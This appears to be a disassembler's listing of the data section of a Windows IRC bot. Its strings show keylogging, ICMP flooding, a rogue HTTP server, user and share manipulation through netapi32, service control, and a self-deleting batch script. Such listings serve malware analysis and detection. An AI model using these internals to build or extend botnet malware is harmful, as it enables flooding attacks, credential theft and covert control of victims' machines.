aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_404807+40C�o
align 4
aSS_2 db '%s%s/',0 ; DATA XREF: sub_404807+3B5�o
align 10h
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_404807+36C�o
; sub_404807+4DA�o
db '<TD WIDTH="%d"><A HREF="',0
align 10h
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_404807+33B�o
align 4
aS_0 db '<%s>',0 ; DATA XREF: sub_404807+311�o
; sub_404807+463�o
align 4
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_404807+2E5�o
aAm db 'AM',0 ; DATA XREF: sub_404807+2C4�o
align 4
aPm db 'PM',0 ; DATA XREF: sub_404807+2B9�o
align 4
a__0: ; DATA XREF: sub_404807+27C�o
unicode 0, <.>,0
a__ db '..',0 ; DATA XREF: sub_404807+264�o
align 8
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_404807+1F0�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_404807+15C�o
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_404807+144�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_404807+107�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_404807+B4�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 4
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_404807+75�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 4
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_404807+3F�o
asc_4236F8: ; DATA XREF: sub_404807+1E�o
; sub_40528F+F7�o ...
dw 0Ah
unicode 0, <>,0
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_404FFA+8A�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
align 8
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_405121+E4�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_405121+CA�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_405121+94�o
; sub_412AEE+17D�o ...
align 10h
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_405121+7B�o
align 4
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_405121:loc_405189�o
align 10h
aTextHtml db 'text/html',0 ; DATA XREF: sub_405121+61�o
align 4
aHttpdFailedT_0 db '[HTTPD]: Failed to start worker thread, error: <%d>.',0
; DATA XREF: sub_40528F+287�o
align 4
aHttpdWorkerThr db '[HTTPD]: Worker thread of server thread: %d.',0
; DATA XREF: sub_40528F+213�o
align 4
asc_4239B4: ; DATA XREF: sub_40528F+16E�o
unicode 0, <*>,0
aS_3 db '%s',0 ; DATA XREF: sub_40528F+31�o
; sub_405D20+44�o ...
align 4
aS_8 db '\%s',0 ; DATA XREF: sub_40528F+27�o
aHttpdErrorServ db '[HTTPD]: Error: server failed, returned: <%d>.',0
; DATA XREF: sub_405549+3E0�o
align 10h
asc_4239F0 db 0Dh,0Ah,0 ; DATA XREF: sub_405549+296�o
align 4
aGet db 'GET ',0 ; DATA XREF: sub_405549+22D�o
align 10h
aIcmpErrorSendi db '[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Return'
; DATA XREF: sub_40598C+2F2�o
db 'ed: <%d>.',0
align 10h
aIcmpDoneWithSF db '[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/s'
; DATA XREF: sub_40598C+288�o
db 'ec (%dMB).',0
aIcmpInvalidTar db '[ICMP]: Invalid target IP.',0 ; DATA XREF: sub_40598C+B6�o
align 4
aIcmpErrorSetso db '[ICMP]: Error: setsockopt() failed, returned: <%d>.',0
; DATA XREF: sub_40598C+8E�o
aIcmpErrorSocke db '[ICMP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_40598C+49�o
aSSS db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_405D20+69�o
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_405D20+16�o
; sub_409806+700�o
aNotice db 'NOTICE',0 ; DATA XREF: sub_405D20+F�o
; sub_409806+70E�o
align 4
aKeylogS db '[KEYLOG]: %s',0 ; DATA XREF: sub_405DD1+CF�o
align 4
aDDDDDDS db '[%d-%d-%d %d:%d:%d] %s',0Dh,0Ah,0 ; DATA XREF: sub_405DD1+A9�o
align 4
aAb db 'ab',0 ; DATA XREF: sub_405DD1+70�o
; sub_409806+5701�o
align 4
asc_423B68: ; DATA XREF: sub_405DD1+36�o
unicode 0, <\>,0
aSReturnS db '%s (Return) (%s)',0 ; DATA XREF: sub_405ED4+223�o
align 10h
aSBufferFullS db '%s (Buffer full) (%s)',0 ; DATA XREF: sub_405ED4+1DA�o
align 4
aSChangedWindow db '%s (Changed Windows: %s)',0 ; DATA XREF: sub_405ED4+8E�o
align 4
aCapgetdriverde db 'capGetDriverDescriptionA',0 ; DATA XREF: sub_4061D5+C50�o
align 10h
aCapcreatecaptu db 'capCreateCaptureWindowA',0 ; DATA XREF: sub_4061D5+C48�o
aAvicap32_dll db 'avicap32.dll',0 ; DATA XREF: sub_4061D5:loc_406E10�o
align 4
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_4061D5+BE6�o
align 4
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_4061D5+BD9�o
align 4
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_4061D5+BCC�o
align 4
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_4061D5+BBF�o
align 4
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_4061D5+BB2�o
align 4
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_4061D5+BAA�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_4061D5:loc_406D72�o
align 4
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_4061D5+B68�o
align 4
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_4061D5+B60�o
align 4
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_4061D5:loc_406D28�o
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_4061D5+B0E�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_4061D5+B01�o
align 4
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_4061D5+AF4�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_4061D5+AEC�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_4061D5:loc_406CB4�o
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_4061D5+AAA�o
align 4
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_4061D5+AA2�o
align 4
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_4061D5:loc_406C6A�o
align 4
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_4061D5+A60�o
align 4
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_4061D5+A58�o
align 10h
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_4061D5:loc_406C20�o
align 4
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_4061D5+9CE�o
align 4
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_4061D5+9C1�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_4061D5+9B4�o
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_4061D5+9A7�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_4061D5+99A�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_4061D5+98D�o
align 4
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_4061D5+980�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_4061D5+973�o
align 10h
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_4061D5+966�o
align 10h
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_4061D5+959�o
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_4061D5+951�o
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_4061D5:loc_406B15�o
align 4
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_4061D5+903�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_4061D5+8F6�o
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_4061D5+8EE�o
align 4
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_4061D5:loc_406AB6�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_4061D5+8B4�o
align 10h
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_4061D5+842�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_4061D5+835�o
align 4
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_4061D5+828�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_4061D5+81B�o
align 10h
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_4061D5+80E�o
align 10h
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_4061D5+801�o
align 4
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_4061D5+7F4�o
align 4
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_4061D5+7E7�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_4061D5+7DA�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_4061D5+7D2�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_4061D5:loc_406996�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_4061D5+688�o
aGetpeername db 'getpeername',0 ; DATA XREF: sub_4061D5+67B�o
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_4061D5+66E�o
align 4
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_4061D5+661�o
align 4
aGethostname db 'gethostname',0 ; DATA XREF: sub_4061D5+654�o
aGetsockname db 'getsockname',0 ; DATA XREF: sub_4061D5+647�o
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_4061D5+63A�o
align 4
aAccept db 'accept',0 ; DATA XREF: sub_4061D5+62D�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_4061D5+620�o
align 4
aSelect db 'select',0 ; DATA XREF: sub_4061D5+613�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_4061D5+60B�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_4061D5+5F9�o
align 4
aRecv db 'recv',0 ; DATA XREF: sub_4061D5+5EC�o
align 10h
aSendto db 'sendto',0 ; DATA XREF: sub_4061D5+5DF�o
align 4
aSend db 'send',0 ; DATA XREF: sub_4061D5+5D2�o
; sub_409806+20C5�o
align 10h
aNtohl db 'ntohl',0 ; DATA XREF: sub_4061D5+5C5�o
align 4
aNtohs db 'ntohs',0 ; DATA XREF: sub_4061D5+5B8�o
align 10h
aHtonl db 'htonl',0 ; DATA XREF: sub_4061D5+5AB�o
align 4
aHtons db 'htons',0 ; DATA XREF: sub_4061D5+59E�o
align 10h
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_4061D5+591�o
align 4
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_4061D5+584�o
align 4
aConnect db 'connect',0 ; DATA XREF: sub_4061D5+577�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_4061D5+56A�o
aSocket db 'socket',0 ; DATA XREF: sub_4061D5+55D�o
align 4
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_4061D5+550�o
align 10h
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_4061D5+543�o
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_4061D5+536�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_4061D5+529�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_4061D5+51C�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_4061D5+50F�o
align 4
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_4061D5+507�o
align 4
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_4061D5+4F6�o
align 10h
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_4061D5+483�o
align 10h
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_4061D5+476�o
align 4
aBitblt db 'BitBlt',0 ; DATA XREF: sub_4061D5+469�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_4061D5+45C�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_4061D5+44F�o
align 4
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_4061D5+442�o
align 4
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_4061D5+435�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_4061D5+428�o
align 10h
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_4061D5+420�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_4061D5:loc_4065E4�o
align 4
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_4061D5:loc_4065BC�o
align 4
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_4061D5+38F�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_4061D5+382�o
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_4061D5+375�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_4061D5+368�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_4061D5+35B�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_4061D5+34E�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_4061D5+341�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_4061D5:loc_40650E�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_4061D5+309�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_4061D5+2FC�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_4061D5:loc_4064C9�o
align 10h
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_4061D5+2AC�o
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_4061D5+29F�o
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_4061D5+292�o
align 10h
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_4061D5+285�o
align 10h
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_4061D5+278�o
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_4061D5+270�o
align 10h
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_4061D5:loc_406434�o
align 10h
aGetforegroundw db 'GetForegroundWindow',0 ; DATA XREF: sub_4061D5+21A�o
aGetwindowtexta db 'GetWindowTextA',0 ; DATA XREF: sub_4061D5+20D�o
align 4
aGetkeystate db 'GetKeyState',0 ; DATA XREF: sub_4061D5+200�o
aGetasynckeysta db 'GetAsyncKeyState',0 ; DATA XREF: sub_4061D5:loc_4063CD�o
align 4
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_4061D5+1A0�o
align 4
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_4061D5+193�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_4061D5+186�o
align 4
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_4061D5+179�o
align 4
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_4061D5+16C�o
align 4
aIswindow db 'IsWindow',0 ; DATA XREF: sub_4061D5+15F�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_4061D5+152�o
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_4061D5+14A�o
align 10h
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_4061D5:loc_40630A�o
; sub_42077B+13�o
align 4
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_4061D5:loc_4062DD�o
align 4
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_4061D5+A0�o
align 10h
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_4061D5+93�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_4061D5+86�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_4061D5+79�o
align 4
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_4061D5+6C�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_4061D5+5F�o
aModule32first db 'Module32First',0 ; DATA XREF: sub_4061D5+52�o
align 10h
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_4061D5+45�o
align 10h
aProcess32first db 'Process32First',0 ; DATA XREF: sub_4061D5+38�o
align 10h
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_4061D5+2B�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_4061D5+23�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_4061D5+A�o
; sub_41EF60+1E�o
align 4
aMainDllTestCom db '[MAIN]: DLL test complete.',0 ; DATA XREF: sub_406E62+2F2�o
align 4
aAvicap32_dllFa db 'Avicap32.dll failed. <%d>',0 ; DATA XREF: sub_406E62+2CC�o
align 4
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_406E62+298�o
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_406E62+264�o
align 4
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_406E62+230�o
align 10h
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_406E62+1FC�o
align 4
aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_406E62+1C8�o
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_406E62+194�o
align 10h
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_406E62+160�o
align 4
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_406E62+12C�o
align 4
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_406E62+F8�o
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_406E62+C4�o
align 4
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_406E62+90�o
align 10h
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_406E62+5C�o
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_406E62+28�o
align 4
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_407327+72�o
align 4
aMirc_0 db 'mIRC',0 ; DATA XREF: sub_4073EC+6�o
; sub_410FF6+18�o
align 10h
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_40746E+1A�o
align 10h
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_407512+2�o
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_407534+13C�o
align 10h
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_407534+80�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_407534+43�o
align 10h
aContinued db 'Continued',0
align 4
aContinue_0 db 'Continue',0
align 4
aPaused db 'Paused',0
align 10h
aPause_0 db 'Pause',0
align 4
aStopped_0 db 'Stopped',0 ; DATA XREF: .text:0042ED3C�o
aStop_0 db 'Stop',0 ; DATA XREF: .text:0042ED38�o
align 4
aStarted db 'Started',0 ; DATA XREF: .text:0042ED30�o
aStart_0 db 'Start',0 ; DATA XREF: .text:0042ED2C�o
align 4
aListed db 'Listed',0 ; DATA XREF: .text:0042ED24�o
align 10h
aList_1 db 'List',0 ; DATA XREF: .text:0042ED20�o
align 4
aDeleted db 'Deleted',0 ; DATA XREF: .text:0042ED18�o
aDelete_0 db 'Delete',0 ; DATA XREF: .text:0042ED14�o
align 4
aAdded db 'Added',0 ; DATA XREF: .text:off_42ED0C�o
align 10h
aAdd db 'Add',0 ; DATA XREF: .text:off_42ED08�o
aAnUnknownErr_0 db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_40786A+128�o
align 4
aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_40786A:loc_40797E�o
align 4
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_40786A:loc_407977�o
align 10h
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_40786A:loc_407970�o
db 'the state of the service.',0
align 4
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_40786A:loc_407969�o
align 4
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_40786A:loc_407962�o
db ' correct access rights.',0
align 4
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_40786A:loc_40795B�o
align 4
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_40786A:loc_407954�o
align 10h
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_40786A:loc_40794D�o
align 8
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_40786A:loc_407946�o
db 'marked for deletion.',0
align 10h
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_40786A:loc_40793F�o
align 4
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_40786A:loc_407914�o
align 4
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_40786A:loc_40790D�o
db ' the service.',0
align 4
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_40786A:loc_407906�o
db 'tServiceCtrlDispatcher.',0
align 4
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_40786A:loc_4078FF�o
align 4
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_40786A+8B�o
align 10h
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_40786A:loc_4078D4�o
db 'dependent on it.',0
align 4
aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_40786A:loc_4078CA�o
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_40786A:loc_4078C0�o
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_40786A:loc_4078B6�o
align 4
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_40786A:loc_4078AC�o
align 4
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_40786A+38�o
align 10h
aSSS_0 db '%s: %s (%s)',0 ; DATA XREF: sub_4079E4+EE�o
aStopped db ' Stopped',0 ; DATA XREF: sub_4079E4:loc_407AB3�o
aStarting db ' Starting',0 ; DATA XREF: sub_4079E4:loc_407AAC�o
aStoping db ' Stoping',0 ; DATA XREF: sub_4079E4:loc_407AA5�o
aRunning db ' Running',0 ; DATA XREF: sub_4079E4:loc_407A9E�o
aContinuing db ' Continuing',0 ; DATA XREF: sub_4079E4:loc_407A97�o
aPausing db ' Pausing',0 ; DATA XREF: sub_4079E4:loc_407A90�o
aPaused_0 db ' Paused',0 ; DATA XREF: sub_4079E4:loc_407A89�o
aUnknown_0 db ' Unknown',0 ; DATA XREF: sub_4079E4+9E�o
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_4079E4+25�o
align 4
aNetUserInfoErr db '[NET]: User info error: <%ld>',0 ; DATA XREF: sub_407CEF+394�o
align 4
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_407CEF+36A�o
align 10h
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_407CEF+33F�o
align 4
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_407CEF+317�o
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_407CEF+2EC�o
align 4
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_407CEF+2C4�o
align 10h
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_407CEF+299�o
align 4
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_407CEF+271�o
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_407CEF+246�o
align 4
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_407CEF+21E�o
align 4
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_407CEF+1F3�o
align 4
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_407CEF+1CB�o
align 4
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_407CEF+1A0�o
align 4
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_407CEF+178�o
align 4
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_407CEF+14D�o
align 4
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_407CEF+125�o
aGuest db 'Guest',0 ; DATA XREF: sub_407CEF:loc_407E08�o
align 4
aUser_1 db 'User',0 ; DATA XREF: sub_407CEF:loc_407E01�o
align 10h
aAdministrator db 'Administrator',0 ; DATA XREF: sub_407CEF:loc_407DFA�o
align 10h
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_407CEF+D4�o
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_407CEF+AC�o
align 10h
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_407CEF+81�o
align 10h
aAccountS db 'Account: %S',0 ; DATA XREF: sub_407CEF+50�o
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_4080BD:loc_4081D6�o
align 4
aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_4080BD:loc_4081CF�o
align 10h
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_4080BD:loc_4081C8�o
align 4
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_4080BD:loc_4081C1�o
align 4
aAnUnknownError db 'An unknown error occurred.',0 ; DATA XREF: sub_4080BD:loc_4081BA�o
align 10h
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_4080BD:loc_40819D�o
db 'ord policy requirement.)',0
align 4
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_4080BD:loc_408196�o
align 4
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_4080BD:loc_40818F�o
align 10h
